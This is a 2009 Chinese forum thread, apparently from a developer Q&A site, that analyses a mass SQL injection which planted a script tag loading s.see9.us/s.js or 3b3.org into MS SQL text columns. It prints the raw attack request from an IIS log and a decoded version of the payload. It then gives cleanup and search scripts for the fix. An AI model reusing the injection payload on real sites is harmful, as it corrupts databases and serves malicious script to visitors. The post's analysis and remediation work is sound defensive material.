分析src=http://s.see9.us/s.js>亦或3b3.org注入攻击及解决方案探讨.解决思路

分析src=http://s.see9.us/s.js>亦或3b3.org注入攻击及解决方案探讨....
author:perfectaction
date :2009.05

从去开始，有很多网站数据库的表的text、ntext、varchar、nvarchar字段内容末尾被加入"></title><script src=http://s.see9.us/s.js><或是3b3.org等字符

我也遇到过，通过分析iis日志，搜索"Update%20"，找到很多，如：
2008-**-** 00:17:54 59.39.69.146 - W3SVC1 80 GET show.asp id=8826;dEcLaRe%20@t%20vArChAr(255),@c%20vArChAr(255)%20dEcLaRe%20tAbLe_cursoR%20cUrSoR%20FoR%20select%20a.nAmE,b.nAmE%20FrOm%20sYsObJeCtS%20a,sYsCoLuMnS%20b%20where%20a.iD=b.iD%20AnD%20a.xTyPe='u'%20AnD%20(b.xTyPe=99%20oR%20b.xTyPe=35%20oR%20b.xTyPe=231%20oR%20b.xTyPe=167)%20oPeN%20tAbLe_cursoR%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20while(@@fEtCh_status=0)%20bEgIn%20exec('Update%20['%2b@t%2b']%20sEt%20['%2b@c%2b']=rtrim(convert(varchar,['%2b@c%2b']))%2bcAsT(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D%20aS%20vArChAr(67))')%20fEtCh%20next%20FrOm%20tAbLe_cursoR%20iNtO%20@t,@c%20eNd%20cLoSe%20tAbLe_cursoR%20dEAlLoCaTe%20tAbLe_cursoR;-- 302 0 HTTP/1.1 211.68.23.76 Mozilla/4.0 - -

这段代码我还原后如下：

SQL code

declare  @t  varchar(255),@c  varchar(255)  declare  table_cursor  cursor  for  select  a.name,b.name  from  sysobjects  a,syscolumns  b  where  a.iD=b.iD  AnD  a.xtype='u'  AnD  (b.xtype=99  or  b.xtype=35  or  b.xtype=231  or  b.xtype=167)  open  table_cursor  fetch  next  from  table_cursor  into  @t,@c  while(@@fetch_status=0)  begin      print('update  [' + @t + ']  set  [' + @c + ']=rtrim(convert(varchar,[' + @c + '])) + cast(0x223E3C2F7469746C653E3C736372697074207372633D687474703A2F2F732E736565392E75732F732E6A733E3C2F7363726970743E3C212D2D  aS  varchar(67))')      fetch  next  from  table_cursor  into  @t,@c  end  close  table_cursor  deallocate  table_cursor;

实事上，上面的print实际为exec..其原理就是通过遍历所有的表中的字符类型字段，然后update其内容，加上攻击者的字符.

同理，若要去掉这些字符，也可以利用上面的代码：

SQL code

declare  @t  varchar(255),@c  varchar(255)  declare  table_cursor  cursor  for select  a.name,b.name  from  sysobjects  a,syscolumns  b  where  a.iD=b.iD  AnD  a.xtype='u'AnD  (b.xtype=99  or  b.xtype=35  or  b.xtype=231  or  b.xtype=167)  declare @str varchar(500)--这里是你要替换的字符set @str='"></title><script src=http://s.see9.us/s.js></script><!--'open  table_cursor  fetch  next  from  table_cursor into  @t,@c  while(@@fetch_status=0)begin    exec('update  [' + @t + ']  set  [' + @c + ']=replace(cast([' + @c + '] as varchar(8000)),'''+@str+''','''')')          fetch  next  from  table_cursor  into  @t,@cendclose  table_cursor  deallocate  table_cursor; 

但事实上，攻击者在update数据库字段时，是采用先截取再加他自己字符的方法，所以对于text/ntext类型，如果你原来的字段内的字符>8000的话，已经无法全部还原成最初状态了.


往往我们还需要看下其它数据库有没有同样被攻击，我写了如下代码：

SQL code

--查某个指定字符出现在哪些表哪些字段:declare @searchstr nvarchar(500)set @searchstr ='3b3.org' --这里是你要查的字符内容declare @t  varchar(255),@c  varchar(255) create table # (name varchar(256),cols varchar(4000))declare  table_cursor  cursor  forselect  a.name,b.name  from  sysobjects  a,syscolumns  b  ,systypes cwhere  a.id=b.id  and  a.xtype='u' and b.xtype=c.xtypeand c.name in ('char','nchar','varchar','nvarchar','text','next')open  table_cursor  fetch  next  from  table_cursorinto  @t,@cwhile(@@fetch_status=0)begin      exec('    set nocount on    if exists(select top 1 1 from  [' + @t + ']  where  cast([' + @c + '] as varchar(8000)) like ''%'+@searchstr+'%'')     begin         if not exists(select 1 from # where name='''+@t+''')            insert into # select '''+@t+''','''+@c+'''        else            update # set cols=cols+'','+@c+''' where name='''+@t+'''        --select '+@c+' from [' + @t + ']  where  [' + @c + '] like ''%'+@searchstr+'%''    end    ')    fetch  next  from  table_cursor  into  @t,@c  endclose  table_cursor  deallocate  table_cursor;select name as '表名',cols as '列名' from #drop table #  
 

这段sql可以查到你的哪些表哪些字段包含某个指定字符.


这种sql注入攻击我怀疑应该是一种工具或称为病毒，但始终没有见过，如果哪位朋友有，希望给我一份，谢谢.





[解决办法]
顶你个肺~~
[解决办法]
顶你个肺2~~
[解决办法]
学习
[解决办法]
学习～～
[解决办法]
帮顶
[解决办法]
.
[解决办法]
学习
[解决办法]

[解决办法]

[解决办法]
都是高手啊
[解决办法]
学习了 www.tg68.cn我搞的网站 希望大家给点建议
[解决办法]
顶你个肺16~~
[解决办法]
看看
[解决办法]
顶你个肺 go on

[解决办法]
好贴好贴。。
[解决办法]
都是高手啊
[解决办法]
MM大叔，水娃不是有个注入专题吗？上面没有这方面的资料？
[解决办法]
kan kan

查看更多 下一篇